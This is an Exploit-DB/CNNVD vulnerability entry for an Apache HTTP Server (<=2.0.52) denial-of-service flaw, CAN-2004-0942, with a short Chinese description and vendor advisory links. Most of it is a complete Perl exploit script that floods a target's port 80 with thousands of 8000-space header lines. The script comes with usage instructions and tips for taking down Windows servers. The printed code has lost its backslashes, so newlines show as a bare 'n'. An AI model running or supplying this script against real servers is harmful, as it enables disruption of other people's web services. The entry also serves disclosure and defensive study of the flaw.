https://www.exploit-db.com/exploits/855
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200502-041

ApacheWebServer是一款HTTP服务程序。ApacheWebServer不正确处理包含多个空格符号的请求，远程攻击者可以利用这个漏洞对服务程序进行拒绝服务攻击。ChintanTrivedi报告远程攻击者可以发送多个特殊构建的包含多个空格符号的HTTPGET请求，可导致WEB服务器消耗大量资源而造成拒绝服务。供应商后来报告字段长度限制不能很好的防止部分恶意请求造成的危害。

#!/usr/bin/perl

# Based on -> 
#             apache-squ1rt.c exploit.
#
#             Original credit goes to Chintan Trivedi on the
#             FullDisclosure mailing list:
#             http://seclists.org/lists/fulldisclosure/2004/Nov/0022.html
#
# More info ->
#   
#             http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0942
# Added ->
#             Added future with we can exploit Apache web servers on windows system. For it you should experiment
#             with [trys] parameter of this code.
#             
#             By default parameter trys = 8000, for DoS Apache web servers on windows system try to 
#             increase this parameter.
#
#             For example. In my system I have 256Mb of RAM. For DoS Apache web severs I run this exploit like this
#
#             C:perl ap2.0.52_dos.pl 127.0.0.1 30000
#
#              <+> Prepare to start connect.
#              <+> Connected to 127.0.0.1
#              <+> Send of first part of devil header.
#              <+> Prepare to DoS with 10000 trys.
#              <+> Start DoS second part of devil header.
#              <SOD> |====================> <EOD>
#              <+> Ok now target web server maybe DoSeD.
#
#
# Note ->    
#           
#             If progresbar not response server mybe already DoSeD. Try to open web page hosted on this web servers.
#             And if you see "Eror 500" you are lucky man :)
#
# Warnings -> 
#             This is POC code you can use only on you own servers. Writer don't response if you damadge you servers or
#             use it for attack, or others things.  
#
# Shit -> 
#             My English now is bulls shit :( I try study it :)
#            

# Tested under Window 2000 SP4 with Apache 2.0.49 (Win)

# Grests fly to Chintan Trivedi NsT, RST, Void, Unlock and other underground world.

# Contact to me at greenwood3[AT]yandex[dot]ru

use IO::Socket;

if (@ARGV <1)
  {
   print "n ::: ---------------------------------------------- :::n";
   print " ::: Another yet DoS exploit for Apache <= 2.0.52   :::n";
   print " ::: Usage:  ap2.0.52_dos.pl <ip> [trys]            :::n";
   print " ::: Coded by GreenwooD from Network Security Team  :::n";
   print " ::: ---------------------------------------------- :::n";
   exit();
  }

print "n <+> Prepare to start connect.n";

$s = IO::Socket::INET->new(Proto=>"tcp",
                            PeerAddr=>$ARGV[0],
                            PeerPort=>80,
                            Timeout=>6
                            ) or die " <-> Target web server already DoSeD ??? or can't connect :(n";
  $s->autoflush();

print " <+> Connected to $ARGV[0]n";
print " <+> Send of first part of devil header.n";    
  
  print $s "GET / HTTP/1.0n";

$trys = 8000; # Default

if ($ARGV[1])
{
  $trys = $ARGV[1];
}

print " <+> Prepare to DoS with $trys trys.n";
print " <+> Start DoS send second part of devil header.n";    
print " <SOD> |";

$i=0;

 do {

     print $s (" " x 8000 . "n"); 

   
      if ($i % 500 == 0)
        { 
         print "=";
        }  

     ++$i;

    } until ($i == $trys); 


print "> <EOD>n";

close($s);

print " <+> Ok now target web server maybe DoSeD.n"; 

# milw0rm.com [2005-03-04]

来源:XF
名称:apache-http-get-dos(17930)
链接:http://xforce.iss.net/xforce/xfdb/17930
来源:HP
名称:HPSBUX01123
链接:http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX01123
来源:TRUSTIX
名称:2004-0061
链接:http://www.trustix.org/errata/2004/0061/
来源:HP
名称:SSRT4876
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110384374213596&w;=2
来源:FULLDISC
名称:20041101DoSinApache2.0.52?
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2004-November/028248.html
来源:REDHAT
名称:RHSA-2004:562
链接:http://www.redhat.com/support/errata/RHSA-2004-562.html
来源:MANDRAKE
名称:MDKSA-2004:135
链接:http://www.mandriva.com/security/advisories?name=MDKSA-2004:135
来源:VUPEN
名称:ADV-2006-0789
链接:http://www.frsirt.com/english/advisories/2006/0789
来源:support.avaya.com
链接:http://support.avaya.com/elmodocs2/security/ASA-2006-081.htm
来源:SUNALERT
名称:102198
链接:http://sunsolve.sun.com/search/document.do?assetkey=1-26-102198-1
来源:SECUNIA
名称:19072
链接:http://secunia.com/advisories/19072
来源:APPLE
名称:APPLE-SA-2005-08-15
链接:http://lists.apple.com